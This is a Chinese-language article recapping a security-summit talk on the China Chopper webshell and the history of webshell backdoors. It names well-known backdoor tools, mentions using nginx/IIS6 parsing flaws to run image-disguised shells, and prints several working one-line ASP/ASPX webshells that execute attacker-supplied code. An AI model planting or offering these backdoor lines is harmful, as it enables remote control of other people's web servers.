中国菜刀(中国菜刀webshell)墙裂推荐

本文是由指尖安全撰稿，主要介绍SSC安全峰会上小刀演讲内容。文章写的很有深度值得搞Web渗透的小伙伴们仔细分

 

本文是由指尖安全撰稿，主要介绍SSC安全峰会上小刀演讲内容文章写的很有深度值得搞Web渗透的小伙伴们仔细分析，下面是正文：相信很多人和小编一样对刀哥的演讲议题都不大清楚，主要是不够重视杀伤力！刀哥重新定义了Webshell，议题中还提到了下一代Webshell的讲解都被小编无情的忽略了。

还有就是PPT里面涉及到的菜刀不是公开版，外面是没有的（至于为什么，你懂！），网盘下载里的nginx+caidao是演示版，没有完整功能，没有插件、无日志功能caidao是特制的，只能连接nginx，没有其余脚本的双向加密功能。

下面就和小编一起再来回顾一下SSC安全峰会上小刀演讲内容所带来的恐怖杀伤力（用小编的话毫不吹嘘来说就是足以改变当前网络攻防现状！0x00 概述WEBSHELL的历史WEBSHELL可以做什么webshell与WAF

WEBSHELL是什么0x01 Webshell历史

之所以没有删减此段内容是出于某种情怀，小刀也是因为情怀才加上此段内容想当年国内计算机相关法律并未完善，各种神器和攻击手法层出不穷指尖认为中国黑客崛起和黑客产业链的兴起和发展主要就在这段时间（1996~2006），缅怀历史的同时指尖也希望国家计算机相关法律越来越完善，尤其针对白帽子渗透测试的权益、第三方漏洞平台的监管等等。

（相关事件自行百度，我们不希望看到大量的漏洞和数据流入地下市场成为黑色产业链的推手，造就了一大批类似于大学生被骗身亡事件，当然这只是大众所看到的，其实相对于看不见的还有更多，这只是冰山一角；既然黑客这一特殊群体被从幕后推到了前台那么请给他们一些空间...）。

相信这是很多人都用过的一个常用的小马，有的时候系统限制用来上传大马的大马体积比较大 一般50K以上功能也多，一般都包括提权命令，磁盘管理，数据库连接借口，执行命令甚至有些以具备自带提权功能和压缩，解压缩网站程序的功能。

这种马隐蔽性不好，而大多代码如不加密的话很多杀毒厂商开始追杀此类程序而小马体积小，容易隐藏，隐蔽性强，最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行，不过功能少，一般只有上传等功能。

这是一个执行CMD命令的马，功能还比较单一相信也都用过

XiaoLu版的大马，有文件上传、文件删除、管理数据库、文件编辑等功能相比前俩个在功能上已经有所增进

这是@桂林老兵 的站长助手，开发初衷是为了方便站长管理站点的，因为好用被黑客们喜爱常用来当作Webshell，逐渐的演变成了黑客工具，这个工具结合了很多功能已经可以查看磁盘文件、文件编辑、上传、删除、操作数据库和执行CMD等等

PhpSpy2006因为功能强大成了前几年很火的一个大马

海洋顶端2006作者好像是Lcx，小编记得当时可是人人必备，各大黑客论坛所录制的教程基本也都会讲海洋顶端2006，什么功能呀，如何使用呀现在回想起来挺有意思的

这是蓝客的一个PHP版后门，可以看到上面标注着的LanKer一句话后门客户端内部版，不像现在圈内的氛围那个共享精神浓厚的年代不知已经被多少热心的蓝客人共享了出去，基本上人人都有

这是一个现在腾讯安全专家二胡（lake2）的ASPX后门，功能也是相当强大接下来我们着重介绍一句话后门

一句话木马短小精悍，而且功能强大，隐蔽性非常好，上图的搜索我们可以看见许多网页都被留有一句话后门我们先来看几种一句话后门： <%execute request(。

"c")%> %><% <%if request (

"c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> <%eval(Request.Item[

"c"],"unsafe");%>无特征隐藏PHP一句话

免责声明：本站所有信息均搜集自互联网，并不代表本站观点，本站不对其真实合法性负责。如有信息侵犯了您的权益，请告知，本站将立刻处理。联系QQ：1640731186